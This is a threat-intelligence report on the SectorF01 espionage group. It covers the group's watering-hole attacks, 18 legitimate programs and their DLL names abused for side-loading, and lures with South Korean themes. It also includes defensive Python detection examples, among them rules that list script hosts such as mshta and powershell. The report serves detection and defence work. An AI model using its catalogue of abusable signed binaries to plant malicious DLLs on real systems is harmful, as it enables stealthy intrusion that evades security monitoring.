“A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is targeted for exploitation.”
MITRE ATT&CK – T1189, Drive-by Compromise


The SectorF01 group targeted specific individuals and organizations by compromising websites frequented by key personnel and activists opposed to the Vietnamese government. It has also attacked government, diplomatic, defense and research websites in Vietnam and in neighboring countries, including Cambodia, China, Laos and the Philippines, and hacked ASEAN-related websites.

The following is the timing of the large-scale watering hole attacks by the SectorF01 group:

• May 2014, September 2014
• January 2015, March 2015
• May 2017
• September 2018, December 2018
• January 2019

When a target accesses such a website, the attacker serves malware disguised as a web browser or plug-in, or displays a fake login page to harvest credentials. The group also registered domains resembling legitimate websites and online services and placed malicious scripts on those look-alike sites to collect information about its targets.

TOO MUCH LOVE for DLL Side-Loading

The SectorF01 group prefers the “DLL Side-Loading” technique to execute its malware. The technique is closely related to, and often grouped with, “DLL Hijacking”, “DLL Preloading” and “DLL Planting”, all of which abuse the way a program locates the DLLs it loads. The MITRE ATT&CK Framework defines “DLL Side-Loading” as follows.

“Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.”
Definition of DLL Side-Loading


When a program loads a DLL by name, without giving a full path, Windows searches the following locations in order. (This is the legacy order that applies when SafeDllSearchMode is disabled; with it enabled, the default since Windows XP SP2, the current directory drops to fifth place, after the Windows directory. Either way, the application's own directory is searched first.)

1. The directory from which the application loaded.
2. The current directory.
3. The system directory. Use the GetSystemDirectory function to get the path of this directory.
4. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
5. The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
Dynamic-Link Library Search Order


Because the directory the executable was loaded from is searched first, a DLL placed there wins over a same-named DLL in the system directory; the only names exempt are those on the KnownDLLs list, which the loader always maps from the system directory. The SectorF01 group therefore distributes the legitimate executable and the malicious DLL together in the same directory, so that running the normal file loads the malicious DLL.

This makes the malicious code appear to be a DLL loaded by a legitimate, often signed, program, which can evade endpoint security solutions that rely on behavior-based detection keyed to the process that performs the action.

The SectorF01 group has distributed MS Windows OS files or popular programs with DLLs to load their malicious DLL files. In some cases, the legitimate files of famous anti-virus software are also used to load malicious DLLs.
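Added example, not code from the report: a small simulation of the loader's search for a DLL referenced by bare name, covering both SafeDllSearchMode orders and the KnownDLLs exception, plus a scan for EXE+DLL pairs sitting together outside trusted install locations. The file set is constructed; `Document.exe` stands in for the renamed WINWORD.EXE lure, and the KnownDLLs set lists only a few of the real entries.

```python
import ntpath
from collections import defaultdict


def search_order(app_dir, cwd, system_dir, windows_dir, path_dirs, safe_dll_search_mode=True):
    """Directories the loader consults, in order, for a DLL referenced by bare name.
    safe_dll_search_mode=True is the default since Windows XP SP2; False is the legacy order
    quoted above, where the current directory is searched second."""
    system16 = ntpath.join(windows_dir, "System")
    if safe_dll_search_mode:
        order = [app_dir, system_dir, system16, windows_dir, cwd]
    else:
        order = [app_dir, cwd, system_dir, system16, windows_dir]
    return order + list(path_dirs)


def resolve_dll(dll_name, present, known_dlls, app_dir, cwd, system_dir, windows_dir, path_dirs,
                safe_dll_search_mode=True):
    """Simulate which file the loader maps for `dll_name`.
    `present` is a set of lower-cased full paths that exist; `known_dlls` mirrors the KnownDLLs registry list."""
    if ntpath.dirname(dll_name):                       # caller gave a path: no search happens
        return dll_name if dll_name.lower() in present else None
    if dll_name.lower() in known_dlls:                 # KnownDLLs always come from the system directory
        return ntpath.join(system_dir, dll_name)
    for directory in search_order(app_dir, cwd, system_dir, windows_dir, path_dirs, safe_dll_search_mode):
        candidate = ntpath.join(directory, dll_name)
        if candidate.lower() in present:
            return candidate
    return None


def find_side_load_candidates(present, system_dir, trusted_prefixes):
    """EXE+DLL pairs sharing a directory outside trusted install locations, noting whether the DLL
    name also exists in the system directory (i.e. the planted copy shadows a Windows DLL)."""
    trusted = tuple(p.lower() for p in trusted_prefixes)
    by_dir = defaultdict(lambda: {"exe": [], "dll": []})
    for path in present:
        directory, name = ntpath.split(path)
        ext = ntpath.splitext(name)[1]
        if ext in (".exe", ".dll"):
            by_dir[directory][ext[1:]].append(name)
    hits = []
    for directory, files in by_dir.items():
        if directory.startswith(trusted) or not files["exe"] or not files["dll"]:
            continue
        for dll in files["dll"]:
            hits.append({"dir": directory, "exes": sorted(files["exe"]), "dll": dll,
                         "shadows_system_dll": ntpath.join(system_dir, dll).lower() in present})
    return sorted(hits, key=lambda h: (h["dir"], h["dll"]))


# Constructed file set for the example (lower-cased, as `present` expects). Document.exe stands in for
# the renamed WINWORD.EXE lure and FlashPlayerApp.exe for the Flash applet case.
SYSTEM32 = r"C:\Windows\System32"
PRESENT = {p.lower() for p in [
    r"C:\Users\victim\Downloads\lure\Document.exe",
    r"C:\Users\victim\Downloads\lure\wwlib.dll",
    r"C:\Users\victim\Downloads\flash\FlashPlayerApp.exe",
    r"C:\Users\victim\Downloads\flash\UxTheme.dll",
    r"C:\Users\victim\Downloads\flash\kernel32.dll",      # planted next to the EXE but never used
    r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
    r"C:\Program Files\Microsoft Office\Office16\wwlib.dll",
    r"C:\Windows\System32\UxTheme.dll",
    r"C:\Windows\System32\kernel32.dll",
]}
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "ntdll.dll"}   # a few entries of the real KnownDLLs list
ENV = dict(cwd=r"C:\Users\victim", system_dir=SYSTEM32, windows_dir=r"C:\Windows",
           path_dirs=[r"C:\Windows\System32", r"C:\Windows"])

if __name__ == "__main__":
    for app_dir, dll in [(r"C:\Users\victim\Downloads\lure", "wwlib.dll"),
                         (r"C:\Users\victim\Downloads\flash", "UxTheme.dll"),
                         (r"C:\Users\victim\Downloads\flash", "kernel32.dll")]:
        print(f"{dll:14} from {app_dir} -> {resolve_dll(dll, PRESENT, KNOWN_DLLS, app_dir, **ENV)}")
    for hit in find_side_load_candidates(PRESENT, SYSTEM32, [r"C:\Windows", r"C:\Program Files"]):
        print(hit)
```

The third lookup is the instructive one: a planted `kernel32.dll` is ignored because the name is on the KnownDLLs list, which is why the DLL names in the list that follows are all ordinary application or non-KnownDLLs system libraries.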

The SectorF01 group loves “DLL Side-Loading” so much that it has abused many legitimate programs. We wondered how many normal programs had been exploited, so we summarized all of those we found.

The normal program files used by the SectorF01 group for “DLL Side Loading” are as follows:

• Microsoft Office Word (WINWORD.EXE)
• Windows Search (SearchIndexer.exe)
• Windows Search (SearchProtocolHost.exe)
• Google Update (GoogleUpdate.exe)
• Adobe AcroTranscoder (AcroTranscoder.exe)
• Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)
• Adobe Acrobat 3D Utility (A3DUtility.exe)
• WeChat (WeChat.exe)
• Coc Coc Browser Update (CocCocUpdate.exe)
• 360安全浏览器 (360 Secure Browser) (360se.exe)
• 360软件管家 (360 Software Manager) (SoftManager.exe)
• Neuber Software Typograf font manager (FontSets.exe)
• McAfee VirusScan On-Demand Scan (mcods.exe)
• McAfee Oem Module (mcoemcpy.exe)
• Symantec Network Access Control (rastlsc.exe)
• Kaspersky Anti-Virus Installation assistant host (avpia.exe)
• Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)
• Avast Antivirus remediation (wsc_proxy.exe)

They used major programs from Microsoft, Google and Adobe, and used popular local programs such as WeChat, Coc Coc Browser, and 360 Secure Browser. They also used programs from anti-virus vendors such as McAfee, Symantec, Kaspersky, and Avast.

Side Load 1 – Microsoft Office Word (WINWORD.EXE)

The SectorF01 group used the normal “WINWORD.EXE” file from Microsoft Office Word for “DLL Side-Loading”. The normal “WINWORD.EXE” loads a DLL named “wwlib.dll”.

To load “wwlib.dll”, the normal “WINWORD.EXE” searches the following paths in order and uses the first copy it finds.

The file “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe” has a filename related to a topic the target is likely to be interested in. It is the normal “WINWORD.EXE” with only the name changed.

They set the file name of their malicious DLL to be “wwlib.dll” and deploy it in the same path along with the renamed normal “WINWORD.EXE” file. When the victim executes this renamed “WINWORD.EXE”, the malicious “wwlib.dll” file is loaded and malware is executed.

The following shows the code in “WINWORD.EXE” that loads the “wwlib.dll” exported “FMain”.

The malicious DLL “wwlib.dll” is loaded and calls the Export function “FMain”.

The “FMain” of the malicious DLL “wwlib.dll” contains the malicious code.
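Added example (not telemetry or code from the report) showing how the renamed-host pattern above and the mshta-based delivery in section (1.6) surface in endpoint logs. The events are constructed to mimic Sysmon's field names: ProcessCreate (Event ID 1) carries `OriginalFileName` from the PE version resource, so a renamed WINWORD.EXE shows up as an `Image` whose basename disagrees with it; ImageLoad (Event ID 7) carries `ImageLoaded` and `Signed`. The DLL name list is taken from this report.

```python
import ntpath

SCRIPT_HOSTS = {"mshta.exe", "msiexec.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# DLL names this report lists as side-loaded by renamed legitimate programs.
SIDE_LOAD_DLLS = {"wwlib.dll", "msfte.dll", "goopdate.dll", "flash video extension.dll", "uxtheme.dll",
                  "bib.dll", "wechatwin.dll", "coccocpdate.dll", "chrome_elf.dll", "dbghelp.dll",
                  "faultrep.dll", "mcvsocfg.dll", "mcutil.dll", "rastls.dll", "product_info.dll", "wsc.dll"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def base(path):
    return ntpath.basename(path or "").lower()


def evaluate(event):
    """Return detection strings for one event shaped like Sysmon's ProcessCreate (1) or ImageLoad (7)."""
    hits = []
    if event.get("EventID") == 1:
        image = base(event.get("Image"))
        original = (event.get("OriginalFileName") or "").lower()
        if original not in ("", "-", "?") and original != image:
            hits.append(f"renamed binary: {image} carries OriginalFileName {original}")
        parent = base(event.get("ParentImage"))
        if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
            hits.append(f"office application spawned a script host: {parent} -> {image}")
    elif event.get("EventID") == 7:
        loaded = (event.get("ImageLoaded") or "").lower()
        if (base(loaded) in SIDE_LOAD_DLLS and loaded.startswith(USER_WRITABLE)
                and (event.get("Signed") or "").lower() == "false"):
            hits.append(f"unsigned {base(loaded)} loaded from a user-writable path by {base(event.get('Image'))}")
    return hits


def scan(events):
    """Run every event through the rules; returns (UtcTime, detection) pairs in log order."""
    return [(e.get("UtcTime"), hit) for e in events for hit in evaluate(e)]


# Constructed events that mimic Sysmon field names; they are not telemetry from the report.
EVENTS = [
    {"EventID": 1, "UtcTime": "2019-01-15 08:01:02", "Image": r"C:\Users\victim\Downloads\lure\Document.exe",
     "OriginalFileName": "WinWord.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 7, "UtcTime": "2019-01-15 08:01:03", "Image": r"C:\Users\victim\Downloads\lure\Document.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\lure\wwlib.dll", "Signed": "false", "Signature": "-"},
    {"EventID": 7, "UtcTime": "2019-01-15 08:05:10", "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ImageLoaded": r"C:\Program Files\Microsoft Office\Office16\wwlib.dll", "Signed": "true",
     "Signature": "Microsoft Corporation"},
    {"EventID": 1, "UtcTime": "2019-01-15 08:06:41", "Image": r"C:\Windows\System32\mshta.exe",
     "OriginalFileName": "MSHTA.EXE", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"},
    {"EventID": 1, "UtcTime": "2019-01-15 08:07:00", "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for when, hit in scan(EVENTS):
        print(when, hit)
```

The renamed-binary rule is the cheapest of the three and catches every side-load host in the list below, because the group renames the legitimate executable but cannot change the version resource without breaking its signature.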

Side Load 2 – Windows Search (SearchIndexer.exe)

The SectorF01 group used the normal “SearchIndexer.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchIndexer.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchIndexer.exe” file. When the victim executes this renamed “SearchIndexer.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchIndexer.exe” loading the “msfte.dll”.

Side Load 3 – Windows Search (SearchProtocolHost.exe)

The SectorF01 group used the normal “SearchProtocolHost.exe” file from “Windows Search” to utilize the “DLL Side-Loading” technique. The normal “SearchProtocolHost.exe” file loads a “msfte.dll” DLL file.

They set the file name of their malicious DLL to be “msfte.dll” and deploy it in the same path along with the renamed normal “SearchProtocolHost.exe” file. When the victim executes this renamed “SearchProtocolHost.exe”, the malicious “msfte.dll” file is loaded and malware is executed.

The following shows the code in “SearchProtocolHost.exe” loading the “msfte.dll”.

Side Load 4 – Google Update (GoogleUpdate.exe)

The SectorF01 group used the normal “GoogleUpdate.exe” file from Google Update to utilize the “DLL Side-Loading” technique. The normal “GoogleUpdate.exe” file loads a “goopdate.dll” DLL file.

They set the file name of their malicious DLL to be “goopdate.dll” and deploy it in the same path along with the renamed normal “GoogleUpdate.exe” file. When the victim executes this renamed “GoogleUpdate.exe”, the malicious “goopdate.dll” file is loaded and malware is executed.

Side Load 5 – Adobe AcroTranscoder (AcroTranscoder.exe)

The SectorF01 group used the normal “AcroTranscoder.exe” file from AcroTranscoder software to utilize the “DLL Side-Loading” technique.

The normal “AcroTranscoder.exe” file loads a “Flash Video Extension.dll” DLL file.

The following is a malicious word document “FW Report on demonstration of former CNRP in Republic of Korea.doc” used by the SectorF01 group.

When this document is executed, the malicious DLL “Flash Video Extension.dll” and the renamed legitimate “AcroTranscoder.exe” are deployed in the same path. When the normal “AcroTranscoder.exe” is executed, the malicious “Flash Video Extension.dll” file is loaded and malware is executed.

The malicious DLL “Flash Video Extension.dll” is loaded and its exported functions are called. The SectorF01 group put its malicious code in the “FLVCore::Uninitialize” function, and every other export points to the same address as “FLVCore::Uninitialize”. Thus, whichever export of “Flash Video Extension.dll” is called, the malware runs.

The “FLVCore::Uninitialize” export function of the malicious DLL “Flash Video Extension.dll” contains the code that performs the malicious actions.

Side Load 6 – Adobe Flash Player Control Panel Applet (FlashPlayerApp.exe)

The SectorF01 group used the normal “FlashPlayerApp.exe” (Adobe Flash Player Control Panel Applet software) to utilize the “DLL Side-Loading” technique. The normal “FlashPlayerApp.exe” file loads a “UxTheme.dll” DLL file.

They set the file name of their malicious DLL to be “UxTheme.dll” and deploy it in the same path along with the renamed normal “FlashPlayerApp.exe” file. When the victim executes this renamed “FlashPlayerApp.exe”, the malicious “UxTheme.dll” file is loaded and malware is executed.

Side Load 7 – Adobe Acrobat 3D Utility (A3DUtility.exe)

The SectorF01 group used the normal “A3DUtility.exe” (Adobe Acrobat 3D Utility software) to utilize the “DLL Side-Loading” technique. The normal “A3DUtility.exe” file loads DLLs such as a “BIB.dll” DLL file.

The SectorF01 group sets the name of their malicious DLLs to “ACE.dll”, “AGM.dll”, “CoolType.dll”, “MSVCP80.dll”, “MSVCR80.dll” in addition to “BIB.dll”. They distribute these files together with the renamed normal “A3DUtility.exe” in the same path. These different DLL files are all loaded by the normal “A3DUtility.exe”.

The following shows the code in “A3DUtility.exe” loading the “AGM.dll”, “BIB.dll”, “CoolType.dll”, and so on.

“BIB.dll” is loaded and its exported function is called. The SectorF01 group's malicious code is inserted into the “BIB_12” function, and every other export address points to the address of “BIB_12”. This lets the malware run no matter which export of “BIB.dll” is called. The other malicious DLLs are configured in the same way.

The exported functions of “BIB.dll”

The “BIB_12” function in “BIB.dll” contains the malicious code.

When the normal “A3DUtility.exe” is executed, the malicious DLL files are loaded and the malware runs.
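Added example, not from the report: a minimal PE export-table reader that flags the pattern described for “Flash Video Extension.dll” and “BIB.dll”, many named exports that all resolve to one address. `build_export_dll` constructs a header-only PE32+ DLL with just an export table for the demonstration (the function RVAs in it point at no real code); the export names follow the report's description, but the file is not a real sample.

```python
import struct


def _cstring(data, offset):
    return data[offset:data.index(b"\0", offset)].decode("ascii", "replace")


def parse_exports(data):
    """Read the export directory of a PE file; returns dll name, [(export name, RVA)] and forwarder count."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    # DataDirectory[0] (export) sits at optional-header offset 112 for PE32+ and 96 for PE32.
    export_rva, export_size = struct.unpack_from("<II", data, opt + (112 if magic == 0x20B else 96))
    sections = []
    for i in range(n_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
        sections.append((va, max(vsize, raw_size), raw_ptr))

    def rva_to_offset(rva):
        for va, size, ptr in sections:
            if va <= rva < va + size:
                return rva - va + ptr
        raise ValueError(f"RVA {rva:#x} is not backed by any section")

    if export_rva == 0:
        return {"dll_name": None, "exports": [], "forwarders": 0}
    off = rva_to_offset(export_rva)
    name_rva, _base, n_funcs, n_names, funcs_rva, names_rva, ords_rva = struct.unpack_from("<7I", data, off + 12)
    funcs = struct.unpack_from(f"<{n_funcs}I", data, rva_to_offset(funcs_rva))
    exports, forwarders = [], 0
    for j in range(n_names):
        name_ptr = struct.unpack_from("<I", data, rva_to_offset(names_rva) + 4 * j)[0]
        ordinal = struct.unpack_from("<H", data, rva_to_offset(ords_rva) + 2 * j)[0]
        rva = funcs[ordinal]
        if export_rva <= rva < export_rva + export_size:   # forwarder string, not code
            forwarders += 1
        exports.append((_cstring(data, rva_to_offset(name_ptr)), rva))
    return {"dll_name": _cstring(data, rva_to_offset(name_rva)), "exports": exports, "forwarders": forwarders}


def collapsed_exports(parsed, minimum=3):
    """True when several named exports all point at one address, the pattern of the side-loaded DLLs above."""
    rvas = {rva for _, rva in parsed["exports"]}
    return len(parsed["exports"]) >= minimum and len(rvas) == 1


def build_export_dll(dll_name, export_names, rvas):
    """Constructed minimal PE32+ DLL holding only an export table (no code); used here as sample input."""
    n = len(export_names)
    edata_rva, raw_ptr = 0x1000, 0x200
    funcs_rva = edata_rva + 40
    names_rva = funcs_rva + 4 * n
    ords_rva = names_rva + 4 * n
    strings, string_rvas = bytearray(), []
    for text in [dll_name] + list(export_names):
        string_rvas.append(ords_rva + 2 * n + len(strings))
        strings += text.encode("ascii") + b"\0"
    edata = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, string_rvas[0], 1, n, n, funcs_rva, names_rva, ords_rva)
    edata += struct.pack(f"<{n}I", *rvas) + struct.pack(f"<{n}I", *string_rvas[1:])
    edata += struct.pack(f"<{n}H", *range(n)) + bytes(strings)
    raw_size = (len(edata) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, 0, len(edata), 0, 0, edata_rva,
                      0x180000000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x2000, 0x200, 0, 2, 0x160,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = struct.pack("<II", edata_rva, len(edata)) + b"\0" * 8 * 15
    section = struct.pack("<8sIIIIIIHHI", b".edata", len(edata), edata_rva, raw_size, raw_ptr, 0, 0, 0, 0, 0x40000040)
    headers = dos + coff + opt + dirs + section
    return headers.ljust(raw_ptr, b"\0") + edata.ljust(raw_size, b"\0")


if __name__ == "__main__":
    parsed = parse_exports(build_export_dll("BIB.dll", ["BIB_1", "BIB_2", "BIB_12", "BIB_13"], [0x1800] * 4))
    for name, rva in parsed["exports"]:
        print(f"{parsed['dll_name']}!{name} -> RVA {rva:#x}")
    print("all exports share one address:", collapsed_exports(parsed))
```

Run against a real DLL on disk the same reader applies unchanged; a legitimate library with dozens of exports at one RVA is rare enough that the collapse check is a useful triage signal for files found next to a renamed host.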

Side Load 8 – WeChat (WeChat.exe)

The SectorF01 group used the normal “WeChat.exe” (WeChat software) to utilize the “DLL Side-Loading” technique. The normal “WeChat.exe” file loads a “WeChatWin.dll” DLL file.

WeChat is a famous Chinese messenger program.

They set the file name of their malicious DLL to be “WeChatWin.dll” and deploy it in the same path along with the renamed normal “WeChat.exe” file. When the victim executes this renamed “WeChat.exe”, the malicious “WeChatWin.dll” file is loaded and malware is executed.

Side Load 9 – Coc Coc Browser Update (CocCocUpdate.exe)

The SectorF01 group used the normal “CocCocUpdate.exe” (Coc Coc Browser Update Software) to utilize the “DLL Side-Loading” technique. The normal “CocCocUpdate.exe” file loads a “coccocpdate.dll” DLL file.

“Coc Coc Browser” is a famous web browser in Vietnam.

The following shows the code in “CocCocUpdate.exe” that loads the “coccocpdate.dll” “DllEntry” function.

They set the file name of their malicious DLL to be “coccocpdate.dll” and deploy it in the same path along with the renamed normal “CocCocUpdate.exe” file. When the victim executes this renamed “CocCocUpdate.exe”, the malicious “coccocpdate.dll” file is loaded and malware is executed.

The “DllEntry” function in “coccocpdate.dll” contains the malicious code.

Side Load 10 – 360安全浏览器 (360 Secure Browser) (360se.exe)

The SectorF01 group used the normal “360se.exe” (360安全浏览器 – 360 Secure Browser) to utilize the “DLL Side-Loading” technique. The normal “360se.exe” file loads a “chrome_elf.dll” DLL file.

“360安全浏览器(360 Secure Browser)” is a famous web browser in China.

The following shows the code in “360se.exe” that loads the “chrome_elf.dll” “SignalInitializeCrashReporting” Export API function.

They set the file name of their malicious DLL to be “chrome_elf.dll” and deploy it in the same path along with the renamed normal “360se.exe” file. When the victim executes this renamed “360se.exe”, the malicious “chrome_elf.dll” file is loaded and malware is executed.

“chrome_elf.dll” is loaded and the Export API function “SignalInitializeCrashReporting” is called.

The “SignalInitializeCrashReporting” function in “chrome_elf.dll” contains the malicious code.

Side Load 11 – 360软件管家 (360 Software Manager) (SoftManager.exe)

The SectorF01 group used the normal “SoftManager.exe” (360软件管家 – 360 Software Manager) to utilize the “DLL Side-Loading” technique. The normal “SoftManager.exe” file loads a “dbghelp.dll” DLL file.

“360软件管家(360 Software Manager)” is a famous software management program in China.

They set the file name of their malicious DLL to be “dbghelp.dll” and deploy it in the same path along with the renamed normal “SoftManager.exe” file. When the victim executes this renamed “SoftManager.exe”, the malicious “dbghelp.dll” file is loaded and malware is executed.

Side Load 12 – Neuber Software Typograf font manager (FontSets.exe)

The SectorF01 group used the normal “FontSets.exe” (Neuber Software Typograf font manager) to utilize the “DLL Side-Loading” technique. The normal “FontSets.exe” file loads a “FaultRep.dll” DLL file.

“Neuber Software Typograf font manager” is a famous font management program.

“FontSets.exe” loads the “FaultRep.dll” file from the same path as the program executed according to the DLL load order of Windows DLLs, before the file is loaded from the Windows system folder.

The following shows the code in “FontSets.exe” that loads the “FaultRep.dll” DLL.

They set the file name of their malicious DLL to be “FaultRep.dll” and deploy it in the same path along with the renamed normal “FontSets.exe” file. When the victim executes this renamed “FontSets.exe”, the malicious “FaultRep.dll” file is loaded and malware is executed.

Side Load 13 – McAfee VirusScan On-Demand Scan (mcods.exe)

The SectorF01 group used the normal “mcods.exe” (McAfee VirusScan On-Demand Scan) to utilize the “DLL Side-Loading” technique. The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

The SectorF01 group uses the legitimate files of anti-virus products because such files are usually whitelisted by other security products, and their behavior may be exempted from monitoring.

The normal “mcods.exe” file loads a “McVsoCfg.dll” DLL file.

“McVsoCfg.dll” is loaded and its export “McVsoCfgGetObject” is called. The “McVsoCfgGetObject” function in the malicious “McVsoCfg.dll” contains the malicious code.

They set the file name of their malicious DLL to be “McVsoCfg.dll” and deploy it in the same path along with the renamed normal “mcods.exe” file. When the victim executes this renamed “mcods.exe”, the malicious “McVsoCfg.dll” file is loaded and malware is executed.

Side Load 14 – McAfee Oem Module (mcoemcpy.exe)

The SectorF01 group used the normal “mcoemcpy.exe” (McAfee Oem Module) to utilize the “DLL Side-Loading” technique. The normal “mcoemcpy.exe” file loads a “McUtil.dll” DLL file.

They set the file name of their malicious DLL to be “McUtil.dll” and deploy it in the same path along with the renamed normal “mcoemcpy.exe” file. When the victim executes this renamed “mcoemcpy.exe”, the malicious “McUtil.dll” file is loaded and malware is executed.

Side Load 15 – Symantec Network Access Control (rastlsc.exe)

The SectorF01 group used the normal “rastlsc.exe” (Symantec Network Access Control) to utilize the “DLL Side-Loading” technique. The normal “rastlsc.exe” file loads a “RasTls.dll” DLL file.

They set the file name of their malicious DLL to be “RasTls.dll” and deploy it in the same path along with the renamed normal “rastlsc.exe” file. When the victim executes this renamed “rastlsc.exe”, the malicious “RasTls.dll” file is loaded and malware is executed.

Side Load 16 – Kaspersky Anti-Virus Installation assistant host (avpia.exe)

The SectorF01 group used the normal “avpia.exe” (Kaspersky Anti-Virus Installation Assistant host) to utilize the “DLL Side-Loading” technique. The normal “avpia.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “avpia.exe” file. When the victim executes this renamed “avpia.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 17 – Kaspersky Light Plugin Extension Registrar (plugins-setup.exe)

The SectorF01 group used the normal “plugins-setup.exe” (Kaspersky Light Plugin Extension Registrar) to utilize the “DLL Side-Loading” technique. The normal “plugins-setup.exe” file loads a “product_info.dll” DLL file.

They set the file name of their malicious DLL to be “product_info.dll” and deploy it in the same path along with the renamed normal “plugins-setup.exe” file. When the victim executes this renamed “plugins-setup.exe”, the malicious “product_info.dll” file is loaded and malware is executed.

Side Load 18 – Avast Antivirus remediation (wsc_proxy.exe)

The SectorF01 group used the normal “wsc_proxy.exe” (Avast Antivirus remediation) to utilize the “DLL Side-Loading” technique. The normal “wsc_proxy.exe” file loads a “wsc.dll” DLL file.

They set the file name of their malicious DLL to be “wsc.dll” and deploy it in the same path along with the renamed normal “wsc_proxy.exe” file. When the victim executes this renamed “wsc_proxy.exe”, the malicious “wsc.dll” file is loaded and malware is executed.

The lures related to South Korea

The SectorF01 group has used more than 800 malware samples over roughly seven years, with lure keywords tied to many countries. Here we summarize the attacks whose lures contain keywords related to South Korea. The group mainly targets Southeast Asian countries; however, a Japanese automobile company in East Asia was likely attacked by the group recently, and similar malware found at around the same time appears to be related to a South Korean automobile company.

We cannot be sure that this attack was carried out on South Korea just because it contained keywords related to South Korea. However, the SectorF01 group is using subjects related to South Korea in their attack, and it is possible that the attack was directly or indirectly related to South Korea. The SectorF01 group has carried out a number of attacks against foreign companies that have entered Vietnam, and so there is a possibility that South Korean companies may be targeted.

Lure 1 – Hyundai Thành Công

There is one malware that the SectorF01 group used in January 2019 to attack specific targets using the “DLL Side-Loading” technique. The file name of the malware used in this attack is “Ho so dang ky lam dai ly uy quyen chinh thuc cua Huyndai – Thanh Cong – Nguyen Thi Mai Phuong.exe”. “Huyndai” in the file name is likely to be a typo of “Hyundai”. “Hyundai – Thanh Cong (Hyundai Thành Công)” is a joint venture established by a South Korean automobile company in cooperation with a large Vietnamese company.

Malware distributed using the subject of “Huyndai [sic] – Thanh Cong”
“HYUNDAI THANH CONG” Website

The malicious “wwlib.dll” also opens the following legitimate document, so the user believes a normal document was opened and does not notice that an executable ran.

Normal document executed by “wwlib.dll”

Lure 2 – Cambodia National Rescue Party in Republic of Korea

There is a malicious document named “FW Report on demonstration of former CNRP in Republic of Korea.doc” that the SectorF01 group used in July 2018 in an attack exploiting CVE-2017-11882. “CNRP” in the file name is most likely an abbreviation of “Cambodia National Rescue Party”, which has many supporters in South Korea. Indeed, in April 2019 thousands of CNRP supporters gathered in Gwangju, South Korea, to demonstrate in support of democracy in Cambodia.

“CNRP” supporters’ demonstrations in Gwangju,Korea, The Phnom Penh Post

When executing the document, the malware is executed by the vulnerability “CVE-2017-11882”. The following screen is displayed when the document is viewed.

“FW Report on demonstration of former CNRP in Republic of Korea.doc” document

Lure 3 – KoreanTimesSSK Font

The SectorF01 group has also used fonts as lure subjects, posing as a font management program or a font file. It seems to use font-related lures because most of the countries it attacks have a non-English native language and therefore need a variety of fonts. In June 2017 the group used a file disguised as a Korean font; the “KoreanTimesSSK” font used in that attack was a Korean font created by Southern Software.

Conclusion

We have traced the SectorF01 group, which has been steadily conducting cyber espionage in Southeast Asia for the past seven years, and examined its initial access methods. The group hacks neighboring countries and opposition forces in order to preserve its own regime and gain economic advantage. It is likely state-level hacking carried out for the benefit of the state; recently it has also targeted other industries, such as the automobile industry of more developed countries, to contribute to its own country's industrial development. These attacks are spreading into the East Asian region and pose a serious threat to neighboring countries and their national institutions.

The scope of activities and number of malware that the group uses every year for attacks is increasing, and we need to understand them more and prepare for their attacks. We should be prepared to effectively detect and respond to their attacks through steady threat hunting and intelligence activities.

Indicators of Compromise

The IOCs containing the malware hashes (827 total) that the SectorF01 group used from 2013 until end of the June 2019 for cyber espionage can be found here.

More information about the SectorF01 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

